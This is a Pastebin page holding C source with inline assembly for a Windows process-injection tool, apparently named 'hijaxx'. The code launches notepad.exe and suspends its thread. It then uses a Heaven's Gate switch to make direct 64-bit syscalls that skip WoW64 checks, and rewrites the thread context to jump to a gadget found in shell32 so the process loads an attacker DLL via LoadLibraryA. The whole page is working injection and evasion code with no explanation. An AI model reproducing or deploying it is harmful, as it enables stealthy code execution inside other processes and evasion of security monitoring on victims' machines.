Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include "hijaxx.h"
- inline DWORD GetSystemServiceNumber(LPCSTR func_name)
- {
- FARPROC NtFunc = GetProcAddress(GetModuleHandle(L"ntdll"), func_name);
- return (DWORD)*(WORD*)((BYTE*)NtFunc + 1);
- }
- //need to call directly into 64bit ntdll as the wow64 version provides sanitation on args
- __declspec(naked) DWORD64 Syscall64(DWORD syscall_number, DWORD argc, ...)
- {
- enum reg { rax_ = 0xc, argc_ = 0x10, rcx_ = 0x14, rdx_ = 0x18, r8_ = 0x1c, r9_ = 0x20, stack_args = 0x24 };
- _asm {
- push 0x33
- call x64
- x64 :
- add dword ptr[esp], 5
- retf
- push ebp
- mov ebp, esp
- mov ecx, dword ptr[esp + argc_]
- cmp ecx, 4
- je no_stack_args
- sub ecx, 1
- load_stack_args:
- mov eax, dword ptr[ebp + rcx_ + ecx * 4]
- cmp ecx, 4
- jl no_stack_args
- push eax
- loopnz load_stack_args
- no_stack_args :
- mov eax, dword ptr[ebp + rax_]
- mov ecx, dword ptr[ebp + rcx_]
- mov edx, dword ptr[ebp + rdx_]
- EMIT(0X67) EMIT(0X44) EMIT(0X8b) EMIT(0X45) EMIT(0X1c) //mov r8d, dword ptr [esp + r8_]
- EMIT(0x67) EMIT(0X44) EMIT(0X8b) EMIT(0X4d) EMIT(0X20) //mov r9d, dword ptr [ebp + r9_]
- EMIT(0X4c) EMIT(0X8b) EMIT(0Xd1) //mov r10, rcx
- sub esp, 20h
- EMIT(0x0F) EMIT(0x05) //syscall
- dec eax
- mov edx, eax
- dec eax
- shr edx, 20h
- mov esp, ebp
- pop ebp
- call x86
- x86:
- mov dword ptr[esp + 4], 0x23
- add dword ptr[esp], 0xd
- retf
- ret
- };
- }
- LPVOID SearchModuleMemory(HMODULE mod, char* search_string, BOOL is_code)
- {
- LPVOID mem_regions = mod;
- MODULEINFO mi = { 0 };
- MEMORY_BASIC_INFORMATION mbi = { 0 };
- GetModuleInformation(GetCurrentProcess(), mod, &mi, sizeof(mi));
- for (; VirtualQuery(mem_regions, &mbi, sizeof(mbi)) == sizeof(mbi); mem_regions = (LPVOID)((SIZE_T)mem_regions + mbi.RegionSize)) {
- if (mbi.State == MEM_COMMIT && mbi.Protect != PAGE_NOACCESS) {
- if ((is_code) && !(mbi.Protect & IMAGE_SECTION_EXECUTABLE))
- continue;
- for (SIZE_T j = 0; j < mbi.RegionSize - 4; j++) {
- if ((memcmp(search_string, (LPVOID)((DWORD)mem_regions + j), sizeof(search_string) - ((is_code) ? 1 : 0))) == 0) {
- return (LPVOID)((DWORD)mem_regions + j);
- }
- }
- }
- }
- return NULL;
- }
- VOID Injex(LPWSTR host_file)
- {
- CONTEXT ctx = { 0 };
- STARTUPINFOW si = { 0 };
- PROCESS_INFORMATION pi = { 0 };
- ctx.ContextFlags = CONTEXT_FULL;
- DWORD len, dll_name = 0x006A2E58;
- CreateProcessW(host_file, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
- Sleep(500);
- SuspendThread(pi.hThread);
- DWORD64 ret = Syscall64(
- GetSystemServiceNumber("NtQueryInformationThread"),
- 5,
- (DWORD)pi.hThread,
- THREAD_WOW_CONTEXT,
- &ctx,
- sizeof(ctx),
- &len);
- //find JOP stuff
- FARPROC _LoadLibraryA = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
- LPVOID remote_lib_string = SearchModuleMemory(GetModuleHandle(L"kernel32.dll"), "1.dll", FALSE);
- //"\x51\xFF\x12"
- //push ecx
- //call[edx]
- LPVOID gadget = SearchModuleMemory(LoadLibrary(L"shell32.dll"), "\x51\xFF\x12", TRUE);
- LPVOID LoadLibraryA_ptr = &_LoadLibraryA;
- LoadLibraryA_ptr = SearchModuleMemory(LoadLibrary(L"shell32.dll"), (char*)LoadLibraryA_ptr, FALSE);
- ctx.Ecx = (DWORD)remote_lib_string;
- ctx.Edx = (DWORD)LoadLibraryA_ptr;
- ctx.Eip = (DWORD)gadget;
- ret = Syscall64(
- GetSystemServiceNumber("NtSetInformationThread"),
- 4,
- (DWORD)pi.hThread,
- THREAD_WOW_CONTEXT,
- &ctx,
- sizeof(ctx));
- ResumeThread(pi.hThread);
- }
- int main(int argc, char *argv[])
- {
- Injex(L"c:\\windows\\system32\\notepad.exe");
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
